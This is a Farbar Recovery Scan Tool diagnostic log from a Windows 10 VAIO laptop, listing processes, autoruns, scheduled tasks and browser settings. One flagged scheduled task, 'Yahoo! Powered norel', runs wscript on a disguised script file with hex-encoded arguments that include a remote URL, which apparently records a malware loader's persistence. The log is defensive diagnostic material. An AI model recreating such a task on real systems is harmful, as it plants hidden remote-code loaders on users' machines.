Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-04-2020
Ran by zabol (administrator) on ZABOL-VAIO (Sony Corporation VPCEJ2B1E) (26-04-2020 17:25:31)
Running from C:\Users\zabol\Downloads
Loaded Profiles: zabol (Available Profiles: zabol & DefaultAppPool)
Platform: Windows 10 Home Version 1803 17134.1130 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint\ApntEx.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint\Apoint.exe
(Alps Electric Co., LTD. -> ALPS) C:\Program Files\Apoint\Apvfb.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Communications Inc. -> Atheros Commnucations) [File not signed] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Atheros Communications Inc. -> Atheros) [File not signed] C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(Byte Technologies LLC -> Byte Technologies LLC) C:\Program Files\ByteFence\ByteFence.exe
(Byte Technologies LLC -> Byte Technologies LLC) C:\Program Files\ByteFence\ByteFenceService.exe
(Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe
(Byte Technologies LLC -> Byte Technologies LLC.) C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe
(McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe
(McAfee, LLC -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe <2>
(McAfee, LLC. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\VSCore_20_1\mcapexe.exe
(McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\CSP\3.4.105.0\McCSPServiceHost.exe
(McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
(McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
(McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
(McAfee, LLC. -> McAfee, LLC.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(McAfee, LLC. -> McAfee, LLC.) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\zabol\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe <3>
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <6>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(Realsil Microelectronics Inc.) [File not signed] C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Sony Corporation -> Sony Corporation) C:\Program Files (x86)\Sony\VAIO Event Service\VESMgr.exe
(Sony Corporation -> Sony Corporation) C:\Program Files (x86)\Sony\VAIO Event Service\VESMgrSub.exe <2>

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint\Apoint.exe [226672 2011-02-17] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [518784 2011-03-29] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [657568 2011-04-29] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-12-06] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3942864 2016-10-13] (Logitech -> Logitech, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4557504 2016-10-06] (Disc Soft Ltd -> Disc Soft Ltd)
HKLM\Software\...\Authentication\Credential Providers: [{503739d0-4c5e-4cfd-b3ba-d881334f0df2}] -> 
GroupPolicy: Restriction ? <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {01CAF3D4-8E43-4958-A768-E9FF0CF046EF} - System32\Tasks\Sony Corporation\VAIO Improvement\VAIOImprovementUploader => C:\Program Files\Sony\VAIO Improvement\viuploader.exe
Task: {0200703F-7396-4242-86E4-58091A0392EE} - System32\Tasks\Sony Corporation\VAIO Smart Network\VSN Logon Start => C:\Program Files\Sony\VAIO Smart Network\VSNClient [Argument = /Start]
Task: {0219AC5C-B0ED-45FB-AF46-8850F781015B} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {02F49418-B3A9-452A-BCBE-1AA7EB12FCE5} - \SONY\VAIO Gate\VAIO Gate -> No File <==== ATTENTION
Task: {05DB183F-C721-4B6F-8F0C-87659E5C70D3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {0B71105C-3270-4CBF-845C-88E4A355D89B} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {0C9A0B32-1DCA-4EDA-95D4-DD083424BA9F} - System32\Tasks\Microsoft\Windows\MobilePC\HotStart => {06DA0625-9701-43DA-BFD7-FBEEA2180A1E}
Task: {0CB8FE39-535B-45AF-8B85-17FD4A7B7D91} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {17065E3C-06AC-4751-B272-4B3019DB890E} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_30_0_0_154_Plugin.exe [1449472 2018-09-08] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {19EECBB3-A85A-4A7B-B976-52B302333E5F} - System32\Tasks\Sony Corporation\VAIO Care\VCOneClick => C:\Program Files\Sony\VAIO Care\VCOneClick.exe
Task: {1E645D37-77CB-4557-9418-F9EA27251D99} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {1F434C6C-9E5E-4C0B-8A71-D40255EA97FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {2FAB8529-D615-443C-B84B-A1E93AC3BDE0} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [126152 2020-04-03] (Mozilla Corporation -> Mozilla Foundation)
Task: {31F56731-5718-41BA-82DB-27756712BC73} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [3939808 2020-02-17] (Byte Technologies LLC -> Byte Technologies LLC) <==== ATTENTION
"C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" was unlocked. <==== ATTENTION
Task: {35C362A3-2D12-434F-9E5E-B25B3380550F} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [1072312 2020-02-04] (McAfee, LLC. -> McAfee, LLC.)
Task: {377745E9-F39A-4FFB-BD21-8D3A8EFC1A3D} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {3EACF46F-CC6B-4D60-8AA0-8A32D5326A51} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316}
Task: {3FC7F099-D23D-4084-BB49-0D3008E3B872} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {476EFF4C-5924-4961-A231-B04E0EF7AF9D} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {486D715E-6AA2-44CF-BC48-B6990CBB53C6} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsMigration => {343D770D-7788-47C2-B62A-B7C4CED925CB}
Task: {4899A258-1C7F-45E9-B36E-4489E0B476FC} - System32\Tasks\Microsoft\Windows\rempl\shell-usoscan => C:\Program Files\rempl\remsh.exe
Task: {49FAEB70-4A78-48E6-AAD3-DDF180EEE598} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB => C:\WINDOWS\system32\MRT.exe [121542864 2020-04-20] (Microsoft Windows -> Microsoft Corporation)
Task: {4A49469C-C781-4449-8F22-C80220DDE295} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4B266040-855A-4AF4-BC15-5CC8063AFC64} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {4D387907-789D-40A1-8843-A2E1D72EA37B} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {51554FBC-4F45-4570-B883-1E2D965AE8A1} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe [4552120 2020-01-06] (McAfee, LLC -> McAfee, LLC.)
Task: {577ED758-0608-451A-9BCE-13F72D17EEAF} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {5845B7D6-2F83-4D17-BD1F-577A43A2F626} - System32\Tasks\Sony Corporation\VAIO Care\VAIO Care => C:\Program Files\Sony\VAIO Care\VCsystray.exe
Task: {5B2FFA78-692B-45C9-B04D-5C4ABEFE0F43} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {5B42DD9C-5A26-4F27-BB95-34603F0997E5} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControls => {DFA14C43-F385-4170-99CC-1B7765FA0E4A}
Task: {606DE82D-710B-4BC2-A9A9-0A11C9E81AAE} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {66BF628C-693A-47F3-924C-89D76AC0073D} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [686384 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {688FF4F3-E869-4F93-8439-D74F0372E87E} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [761424 2020-02-05] (McAfee, LLC. -> McAfee, LLC.)
Task: {75357ED9-28F8-4B17-B026-DDC9985D375E} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {769788B7-BB7A-4D30-8AC3-7B246ADC2607} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {85509B6D-B93A-4B5A-9818-4417DD34CEE1} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {8759E6A5-A1AE-4C1B-8760-FD332C3A75FC} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {8A5EF49E-B35C-4217-BBDE-465D8C3E1D8D} - System32\Tasks\Yahoo! Powered norel => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{2BB5EED6-A1F7-6410-2731-FA52BD73719C}\tofo.txt" "68747470733a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b32424235454544362d413146372d363431302d323733312d4641353242443733373139437d5c66696c656661" "433a5c50726f6772616d446174615c7b32424235454544362d413146372d363431302d3237 (the data entry has 80 more characters). <==== ATTENTION
Task: {8BC9CC01-7AAD-4276-BE47-3CADB5E14E87} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.4.134\DADUpdater.exe [4147336 2020-03-20] (McAfee, Inc. -> McAfee, LLC)
Task: {8CA07F8A-CF6B-41DD-974F-C761E0E86D16} - System32\Tasks\McAfee\McAfee DAT Built in test => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.9.577\mcdatrep.exe [1826656 2020-04-20] (McAfee, Inc. -> McAfee, LLC.)
Task: {8D5112D6-4C1C-4E51-A724-1BC87D0C7694} - System32\Tasks\Sony Corporation\VAIO Update\VAIO Update 5 => C:\Program Files\Sony\VAIO Update 5\VAIOUpdt.exe
Task: {9081B71D-FFEA-4FFF-A02F-71C6442ED2FF} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {95C346C1-5879-4AE1-971A-42B814935049} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {983E9318-AF05-451C-9A77-79D4D173EEAF} - System32\Tasks\Microsoft\Windows\SideShow\SessionAgent => {45F26E9E-6199-477F-85DA-AF1EDFE067B1}
Task: {9CEFDE0B-B339-4DC1-B65D-CACA7E9309B4} - System32\Tasks\Sony Corporation\VAIO Improvement Validation\VAIO Improvement Validation => C:\Program Files\Sony\VAIO Improvement Validation\viv.exe [208224 2011-01-20] (Sony Corporation -> Sony Corporation)
Task: {A15965F1-3D73-4527-AEDD-C9A07E5556BE} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {A1F74446-09AE-481F-9864-111BEC127F03} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18227896 2020-03-19] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {A42671E7-69C2-4F73-B967-2245424E4483} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {A4B23938-4004-4694-89F7-E61243BB65DB} - \SONY\VAIO Gate\StartExecuteProxy -> No File <==== ATTENTION
Task: {B0CBAB43-44FC-469B-A4CE-87426761FDCE} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371}
Task: {B50B7033-7B29-4D05-A575-5E8119742796} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {BB26D8E7-F4CA-4DD3-B841-D57F54CD391F} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {C31999AF-9F75-45BA-820D-4ADA3918AA32} - System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders => {7CCA6768-8373-4D28-8876-83E8B4E3A969}
Task: {C38B21A7-9410-42C9-BB35-84E86CAAAB3F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {CA3CA04B-9C5A-4BE1-88F5-91351E8E6314} - System32\Tasks\Microsoft\Windows\SideShow\GadgetManager => {FF87090D-4A9A-4F47-879B-29A80C355D61}
Task: {CC710CBA-DBAE-4476-BC02-0F4B91C479DB} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {CD83250B-7F86-4DF6-B4C6-4709B4B5AF22} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [569416 2016-02-23] (Apple Inc. -> Apple Inc.)
Task: {CE119A72-BF94-4E49-83FC-92F583E0E4E4} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {CE6B8B9D-DCD1-469D-A539-256F142D67FE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {D1EFF40B-842A-41C0-9890-40157AD72B4E} - System32\Tasks\{C2BE6EEA-2151-49FA-B991-9DF0B78927B9} => C:\WINDOWS\system32\pcalua.exe -a C:\Users\zabol\AppData\Local\{42F774AB-665F-1813-0BC7-3DFB2FAFC163}\uninst.exe -c -P=/Uninstall /s /noun /DelSelfDir
Task: {D321CDCE-7C9F-40BD-B9CF-C68F0BA0D380} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {D978EF7A-7A03-4D53-A851-A731FDF11E26} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {DBFF1597-4C7D-4E9D-ADAF-AF19CBCD52B3} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E773AC1F-515F-4EA2-B982-A7C6C2AEBD96} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {E9BBD3E0-6993-41F2-ABDE-87A628D8DF1E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {F4B84655-0ECE-46B3-9277-7D8DF47016CF} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {FF6789A4-FDDD-485D-A5CC-B10DA94F0C53} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [1072312 2020-02-04] (McAfee, LLC. -> McAfee, LLC.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Yahoo! Powered norel.job => Wscript.exe C:\ProgramData\{2BB5EED6-A1F7-6410-2731-FA52BD73719C}\tofo.txt <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{72c231dd-7624-4efc-ab06-689daaa0c895}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{7c4b93f2-72eb-4fe0-830e-a9a788862a0c}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.co.uk/
HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://vaioportal.sony.eu
HKU\S-1-5-21-4079176776-4138653130-3161291867-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxps://www.google.co.uk/
URLSearchHook: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 - (No Name) - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - No File
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.bing.com/search?q={searchTerms}&form=SNYEDF&pc=MASE&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.bing.com/search?q={searchTerms}&form=SNYEDF&pc=MASE&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.bing.com/search?q={searchTerms}&form=SNYEDF&pc=MASE&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 -> {9E2D726D-83A3-4DA3-84F9-2189EDE14402} URL = hxxp://services.zinio.com/search?s={searchTerms}&rf=sonyslices
SearchScopes: HKU\S-1-5-21-4079176776-4138653130-3161291867-1000 -> {A642BFE8-A124-45B7-9619-05FE0DB1C4A7} URL = hxxp://rover.ebay.com/rover/1/710-42480-16445-33/4?mpre=hxxp://shop.ebay.co.uk/?oemInLn=ieSrch-Q311&_nkw={searchTerms}
BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2020-04-26] (McAfee, LLC -> McAfee, LLC)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2016-03-21] (Sun Microsystems, Inc. -> Sun Microsystems, Inc.)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2011-04-29] (Atheros Communications Inc. -> Atheros Commnucations) [File not signed]
BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2020-04-26] (McAfee, LLC -> McAfee, LLC)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll [2016-03-21] (Sun Microsystems, Inc. -> Sun Microsystems, Inc.)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - No File
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll [2020-02-05] (McAfee, LLC. -> McAfee, LLC.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2020-02-05] (McAfee, LLC. -> McAfee, LLC.)

FireFox:
========
FF DefaultProfile: s3btr4yb.default-1587910666053
FF ProfilePath: C:\Users\zabol\AppData\Roaming\Mozilla\Firefox\Profiles\s3btr4yb.default-1587910666053 [2020-04-26]
FF Extension: (Polski Language Pack) - C:\Users\zabol\AppData\Roaming\Mozilla\Firefox\Profiles\s3btr4yb.default-1587910666053\Extensions\langpack-pl@firefox.mozilla.org.xpi [2020-04-26]
FF Extension: (Polish Spellchecker Dictionary) - C:\Users\zabol\AppData\Roaming\Mozilla\Firefox\Profiles\s3btr4yb.default-1587910666053\Extensions\pl@dictionaries.addons.mozilla.org.xpi [2020-04-26]
FF Extension: (uBlock Origin) - C:\Users\zabol\AppData\Roaming\Mozilla\Firefox\Profiles\s3btr4yb.default-1587910666053\Extensions\uBlock0@raymondhill.net.xpi [2020-04-26]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll [2018-09-08] (Adobe Systems Incorporated -> )
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll [2016-03-21] (Sun Microsystems, Inc.) [File not signed]
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2020-02-05] (McAfee, LLC. -> )
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2018-08-10] (VideoLAN -> VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll [2018-09-08] (Adobe Systems Incorporated -> )
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll [2016-03-21] (Sun Microsystems, Inc.) [File not signed]
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2020-02-05] (McAfee, LLC. -> )
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\zabol\AppData\Local\Google\Chrome\User Data\Default [2020-04-26]
